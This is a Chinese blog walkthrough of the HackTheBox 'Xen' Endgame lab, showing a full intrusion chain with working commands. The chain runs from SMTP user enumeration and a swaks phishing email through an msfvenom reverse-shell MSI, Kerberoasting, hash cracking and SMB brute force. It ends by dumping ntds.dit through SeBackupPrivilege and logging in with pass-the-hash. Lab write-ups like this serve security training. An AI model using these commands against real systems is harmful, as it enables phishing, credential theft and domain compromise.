<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="HackTheBox:Endgame-Xen前言  Xen需要htb的VIP才能访问的，我这里建议是直接开VIP+,因为有时候我们需要用到Pwnbox。我这里采用kali+Pwnbox的攻击方式。   由于参考了大量的文章，无法一一列举，我这里对师傅们说声抱歉。 Breach  nmap扫描入口ip    80、443端口开放，先访问一下   访问10.13.38.12跳转为humongousre">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB-Endgames-Xen">
<meta property="og:url" content="http://example.com/2022/01/28/HTB-Endgames-Xen/index.html">
<meta property="og:site_name" content="ling">
<meta property="og:description" content="HackTheBox:Endgame-Xen前言  Xen需要htb的VIP才能访问的，我这里建议是直接开VIP+,因为有时候我们需要用到Pwnbox。我这里采用kali+Pwnbox的攻击方式。   由于参考了大量的文章，无法一一列举，我这里对师傅们说声抱歉。 Breach  nmap扫描入口ip    80、443端口开放，先访问一下   访问10.13.38.12跳转为humongousre">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/ALwiKzCbfdxTJhP.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/62ICaqfFopxO7HB.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/YIe9ahQNMjyFGls.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/YE28birSK6tq5oX.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/ptj2zxrieATyvCa.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/u1PNnjHebQfzLiZ.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/vm9nE3gjwbkWS4M.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/uioatgVFQ4PXxwc.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/j5YvURVzWkMndLe.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/ZyltW7TIdwGEiUD.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/I8hwxTyS2AJP5Rs.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/s2KLBb8exph9DOH.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/ZRbqWo5y3O4KpS6.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/TVDXkwitLMzH943.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/BIc7wxTh5HrZMjf.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/B5vjrR9VmUsAX63.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/8gbicTPDStWzphJ.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/8iEzHIbYs4vDgwf.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/KpqbjweMYcQ6AiO.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/1a9iQRScZ8z2Ihq.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/1GmwOCyZk5bpjN9.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/PXysbCzZMldqEIQ.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/sg2nJtjZrSEK83m.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/OS6DNi1TAyYts8v.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/Th8NC1YyzsZABgo.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/2DwO7Fn43s6uelE.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/5kRxaCHeIlPTmMW.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/vGo8VLPNz4Z2Jtc.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/OguDaELIqrsiV9b.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/28/LhusVITo4E6yz2f.png">
<meta property="article:published_time" content="2022-01-27T23:31:01.000Z">
<meta property="article:modified_time" content="2022-01-27T23:52:28.910Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="hackthebox">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2022/01/28/ALwiKzCbfdxTJhP.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>HTB-Endgames-Xen</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/projects_url">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2022/02/06/mssql-%E6%9D%82%E8%AE%B0/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2022/01/26/PHP-Audit-Labs-CTF%E4%B8%8B%E7%AF%87/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2022/01/28/HTB-Endgames-Xen/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&text=HTB-Endgames-Xen"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&title=HTB-Endgames-Xen"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&is_video=false&description=HTB-Endgames-Xen"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HTB-Endgames-Xen&body=Check out this article: http://example.com/2022/01/28/HTB-Endgames-Xen/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&title=HTB-Endgames-Xen"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&title=HTB-Endgames-Xen"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&title=HTB-Endgames-Xen"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&title=HTB-Endgames-Xen"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&name=HTB-Endgames-Xen&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2022/01/28/HTB-Endgames-Xen/&t=HTB-Endgames-Xen"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HackTheBox-Endgame-Xen"><span class="toc-number">1.</span> <span class="toc-text">HackTheBox:Endgame-Xen</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Breach"><span class="toc-number">1.2.</span> <span class="toc-text">Breach</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Deploy"><span class="toc-number">1.3.</span> <span class="toc-text">Deploy</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ghost"><span class="toc-number">1.4.</span> <span class="toc-text">Ghost</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Camouflage"><span class="toc-number">1.5.</span> <span class="toc-text">Camouflage</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Doppelganger"><span class="toc-number">1.6.</span> <span class="toc-text">Doppelgänger</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Owned"><span class="toc-number">1.7.</span> <span class="toc-text">Owned</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        HTB-Endgames-Xen
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">John Doe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-01-27T23:31:01.000Z" itemprop="datePublished">2022-01-28</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/hackthebox/" rel="tag">hackthebox</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="HackTheBox-Endgame-Xen"><a href="#HackTheBox-Endgame-Xen" class="headerlink" title="HackTheBox:Endgame-Xen"></a>HackTheBox:Endgame-Xen</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>  <code>Xen</code>需要<code>htb</code>的<code>VIP</code>才能访问的，我这里建议是直接开<code>VIP+</code>,因为有时候我们需要用到<code>Pwnbox</code>。我这里采用<code>kali</code>+<code>Pwnbox</code>的攻击方式。</p>
<p>  <strong>由于参考了大量的文章，无法一一列举，我这里对师傅们说声抱歉。</strong></p>
<h2 id="Breach"><a href="#Breach" class="headerlink" title="Breach"></a>Breach</h2><p>  <code>nmap</code>扫描入口<code>ip</code></p>
<p><img src="https://s2.loli.net/2022/01/28/ALwiKzCbfdxTJhP.png" alt="image-20220127161653675"></p>
<p>  <code>80、443</code>端口开放，先访问一下</p>
<p>  访问<code>10.13.38.12</code>跳转为<code>humongousretail.com</code>，在<code>hosts</code>添加<code>映射域名</code>信息，重新访问。</p>
<p><img src="https://s2.loli.net/2022/01/28/62ICaqfFopxO7HB.png" alt="image-20220127161851800"></p>
<p>  浏览一圈<code>humongousretail.com</code>，没啥信息开始目录爆破</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://humongousretail.com/ -k</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/YIe9ahQNMjyFGls.png" alt="image-20220127163404102"></p>
<p>  访问<code>https://humongousretail.com/remote/</code>跳转到<code>citrix</code>登录页面</p>
<p><img src="https://s2.loli.net/2022/01/28/YE28birSK6tq5oX.png" alt="image-20220127163806798"></p>
<p>  尝试过常用的弱口令后还是无法登录，只能把思路转到别处，根据<code>nmap</code>扫描结果，还有个<code>smtp</code>服务没测试</p>
<p>  <code>smtp</code>服务，只能用来伪造邮箱钓鱼或者爆破邮箱账号，除此之位无非就是<code>smtp</code>账号信息泄露，所以我采用伪造邮箱钓鱼，但是没有邮箱怎么办，那就先爆破获取账号。</p>
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smtp-user-enum -M RCPT -D humongousretail.com -t 10.13.38.12 -U /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -m 50</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/ptj2zxrieATyvCa.png" alt="image-20220127181040504"></p>
<p>  获取完邮箱后使用<code>swaks</code>发送钓鱼邮箱，用<code>nc</code>接收返回的信息</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">swaks --to SALES@humongousretail.com --from it@humongousretail.com --header <span class="string">&quot;citrix error&quot;</span> --body <span class="string">&quot;&lt;a href=&quot;</span>http://10.10.16.118<span class="string">&quot;&gt;citrix error&lt;/a&gt;&quot;</span> --server 10.13.38.12 -p 25</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/u1PNnjHebQfzLiZ.png" alt="image-20220127182253503"></p>
<p>  钓到三个账号</p>
<ul>
<li><p>awardel</p>
</li>
<li><p>pmorgan</p>
</li>
<li><p>jmendes</p>
<p>现在我们获取到的信息，可以让我们登录<code>citrix Xen app</code></p>
<p>登录后台后，使用<code>ICAClient</code>打开<code>launch.ica</code>，<code>ICAClient</code>需要去<code>citrix </code>官方下载，如果遇到一打开<code>launch.ica</code>就提示文件不见的，可以尝试把文件的<code>RemoveICAFile</code>设置为<code>no</code>。</p>
<p>进入<code>Windows</code>使用快捷键创建<code>cmd.exe</code></p>
</li>
</ul>
<p><img src="https://s2.loli.net/2022/01/28/vm9nE3gjwbkWS4M.png" alt="image-20220127183350464"></p>
<h2 id="Deploy"><a href="#Deploy" class="headerlink" title="Deploy"></a>Deploy</h2><p>  使用命令检测发现目标存在<code>AlwaysInstallElevated</code></p>
<p><img src="https://s2.loli.net/2022/01/28/uioatgVFQ4PXxwc.png" alt="image-20220127183846686"></p>
<p>  使用<code>metasploit</code>创建<code>msi</code>进行提权，我这里建议把提权的<code>shell</code>转到<code>pwnbox</code>上，不然网络会很卡。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp -f msi LHOST=10.10.10.10 LPORT=1234 &gt; me.msi</span><br><span class="line"></span><br><span class="line">use exploit/multi/handler </span><br><span class="line"><span class="built_in">set</span> payload windows/x64/meterpreter/reverse_tcp</span><br><span class="line"><span class="built_in">set</span> lhost 10.10.10.10</span><br><span class="line"><span class="built_in">set</span> lport 1234</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/j5YvURVzWkMndLe.png" alt="image-20220127184747161"></p>
<p>  使用<code>Invoke-Kerberoast.ps1</code>抓取<code>TGS</code>,将抓取下来的<code>hash</code>进行爆破获取明文密码，<code>mturner</code>为用户账号</p>
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat -m 13100 -a 0 ./<span class="built_in">hash</span> /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/dive.rule --force </span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/ZyltW7TIdwGEiUD.png" alt="image-20220127203202563"></p>
<p>  使用脚本扫描内网信息</p>
<p><img src="https://s2.loli.net/2022/01/28/I8hwxTyS2AJP5Rs.png" alt="image-20220128061047545"></p>
<h2 id="Ghost"><a href="#Ghost" class="headerlink" title="Ghost"></a>Ghost</h2><p>  现在使用<code>Metasploit</code>设置代理</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -s 172.16.249.0/24</span><br><span class="line">background</span><br><span class="line">use auxiliary/server/socks_proxy </span><br><span class="line"><span class="built_in">set</span> SRVHOST 127.0.0.1</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/s2KLBb8exph9DOH.png" alt="image-20220127205313929"></p>
<p>  使用<code>crackmapexec</code>枚举目标<code>smb</code>目录情况</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains crackmapexec smb 172.16.249.201 -u mturner -p <span class="string">&quot;4install!&quot;</span> --sam</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/ZRbqWo5y3O4KpS6.png" alt="image-20220127225947936"></p>
<p>  使用<code>smbclient</code>连接目标<code>SMB</code></p>
<ul>
<li>如果使用<code>smbclient</code>出现<code>protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED</code></li>
<li>进入<code>/etc/samba/smb.conf</code>在<code>[global]</code>添加下面命令</li>
<li><code>client min protocol = CORE</code></li>
<li><code>client max protocol = SMB3</code></li>
</ul>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains smbclient \\\\<span class="number">172.16</span>.<span class="number">249.201</span>\\Citrix<span class="variable">$</span> <span class="literal">-U</span> htb.local\\mturner</span><br></pre></td></tr></table></figure>

<p>  进入目标后发现<code>flag</code>和<code>private.ppk</code>，直接<code>get </code>下载下来</p>
<p><img src="https://s2.loli.net/2022/01/28/TVDXkwitLMzH943.png" alt="image-20220127230804813"></p>
<h2 id="Camouflage"><a href="#Camouflage" class="headerlink" title="Camouflage"></a>Camouflage</h2><p> 把<code>private.ppk</code>转成<code>john</code>可以爆破的格式，然后使用<code>kwp</code>生成字典，最后开始爆破</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">putty2john private.ppk &gt; private.txt</span><br><span class="line">./kwp basechars/full.base keymaps/en.keymap routes/2-to-16-max-3-direction-changes.route &gt; largekwp.txt</span><br><span class="line">john --wordlist=/home/htb-backk/Desktop/kwprocessor/largekwp.txt private</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/BIc7wxTh5HrZMjf.png" alt="image-20220128005318221"></p>
<p>  将<code>private.ppk</code>转成<code>id_rsa</code>格式</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">puttygen private.ppk -O private-openssh -o id_rsa</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/B5vjrR9VmUsAX63.png" alt="image-20220128025504783"></p>
<p>  在尝试登录时，发现常用的账号都无法登录，还显示不是允许登录用户，在<code>citrix</code>产品文档查到他们使用的用户名是<code>nsroot</code>，同时还看到只要使用<code>shell</code>切换到<code>shell</code>模式</p>
<p><img src="https://s2.loli.net/2022/01/28/8gbicTPDStWzphJ.png" alt="image-20220128031349313"></p>
<p>  登录目录后发现有两个文件<code>capture.cap</code>、<code>capture.pcap</code>使用<code>scp</code>下载</p>
<p>  <code>scp</code>有个奇葩的地方，就是使用密钥，登录时要把密钥放到第一位置，不然提示<code>id_rsa: Not a directory</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap /home/htb-backk/Desktop</span><br></pre></td></tr></table></figure>

<p>  使用<code>wireshark</code>打开下载的文件，这里面有<code>flag</code>，除了<code>flag</code>还有一个密码在这里面</p>
<p><img src="https://s2.loli.net/2022/01/28/8iEzHIbYs4vDgwf.png" alt="image-20220128032447398"></p>
<h2 id="Doppelganger"><a href="#Doppelganger" class="headerlink" title="Doppelgänger"></a>Doppelgänger</h2><p>  得到域密码后开始进攻域控</p>
<p>  使用之前获取到的账号都无法登录，这里使用域账号进行爆破,域账号在前面的主机上使用<code>net user /domain</code>即可获取</p>
<p><img src="https://s2.loli.net/2022/01/28/KpqbjweMYcQ6AiO.png" alt="image-20220128040627541"></p>
<p>  我这里使用<code>Metasploit </code>的<code>smb_login</code>进行爆破</p>
<p><img src="https://s2.loli.net/2022/01/28/1a9iQRScZ8z2Ihq.png" alt="image-20220128043416928"></p>
<p>  使用<code>evil-winrm</code>登录<code>DC</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -u backup-svc -p <span class="string">&#x27;#S3rvice#@cc&#x27;</span> -i 172.16.249.200</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/1GmwOCyZk5bpjN9.png" alt="image-20220128054210727"></p>
<h2 id="Owned"><a href="#Owned" class="headerlink" title="Owned"></a>Owned</h2><p>  使用<code>whoami /priv</code>命令检测发现域控存在<code>SeBackupPrivilege</code>，我们可以利用来提权</p>
<p>  <code>SeBackupPrivilege</code>提权的方法有两种，我这里只用第一种，这里推荐大家看<a target="_blank" rel="noopener" href="https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/">hackingarticles.in</a>的文章</p>
<p>  <img src="https://s2.loli.net/2022/01/28/PXysbCzZMldqEIQ.png" alt="image-20220128054441982"></p>
<p>  在<code>kali</code>上创建<code>ling.dsh</code>文件</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> context persistent nowriters</span><br><span class="line">add volume c: alias ling</span><br><span class="line">create</span><br><span class="line">expose %ling% z:</span><br><span class="line"></span><br><span class="line">unix2dos ling.dsh </span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/sg2nJtjZrSEK83m.png" alt="image-20220128054828471"></p>
<p>  上传到目标，使用<code>evil-winrm</code>上传时，建议到文件所在目录上传</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> C:\Temp\ling</span><br><span class="line">upload ling.dsh</span><br><span class="line">diskshadow /s ling.dsh</span><br><span class="line">robocopy /b z:\windows\ntds . ntds.dit</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/OS6DNi1TAyYts8v.png" alt="image-20220128055202544"></p>
<p><img src="https://s2.loli.net/2022/01/28/Th8NC1YyzsZABgo.png" alt="image-20220128055315727"></p>
<p>  完成了<code>ntds</code>部分，现在继续完成另一部分</p>
  <figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">reg save hklm\system c:\Temp\ling\system</span><br><span class="line"><span class="built_in">cd</span> C:\Temp\ling</span><br><span class="line">download c:\temp\ling\ntds.dit ntds.dit</span><br><span class="line">download c:\temp\ling\system system</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/2DwO7Fn43s6uelE.png" alt="image-20220128055646473"></p>
<p><img src="https://s2.loli.net/2022/01/28/5kRxaCHeIlPTmMW.png" alt="image-20220128060621259"></p>
<p><img src="https://s2.loli.net/2022/01/28/vGo8VLPNz4Z2Jtc.png" alt="image-20220128070054811"></p>
<p>  将下载下来都文件使用<code>impacket-secretsdump </code>进行读取<code>hash</code>值</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-secretsdump -ntds ntds.dit -system system <span class="built_in">local</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/OguDaELIqrsiV9b.png" alt="image-20220128060811531"></p>
<p>  最后使用<code>evil-winrm</code>登录</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -u Administrator -H 822601ccd7155f47cd955b94af1558be -i 172.16.249.200</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/28/LhusVITo4E6yz2f.png" alt="image-20220128061552234"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HackTheBox-Endgame-Xen"><span class="toc-number">1.</span> <span class="toc-text">HackTheBox:Endgame-Xen</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Breach"><span class="toc-number">1.2.</span> <span class="toc-text">Breach</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Deploy"><span class="toc-number">1.3.</span> <span class="toc-text">Deploy</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ghost"><span class="toc-number">1.4.</span> <span class="toc-text">Ghost</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Camouflage"><span class="toc-number">1.5.</span> <span class="toc-text">Camouflage</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Doppelganger"><span class="toc-number">1.6.</span> <span class="toc-text">Doppelgänger</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Owned"><span class="toc-number">1.7.</span> <span class="toc-text">Owned</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2022/01/28/HTB-Endgames-Xen/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&text=HTB-Endgames-Xen"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&title=HTB-Endgames-Xen"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&is_video=false&description=HTB-Endgames-Xen"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HTB-Endgames-Xen&body=Check out this article: http://example.com/2022/01/28/HTB-Endgames-Xen/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&title=HTB-Endgames-Xen"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&title=HTB-Endgames-Xen"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&title=HTB-Endgames-Xen"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&title=HTB-Endgames-Xen"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
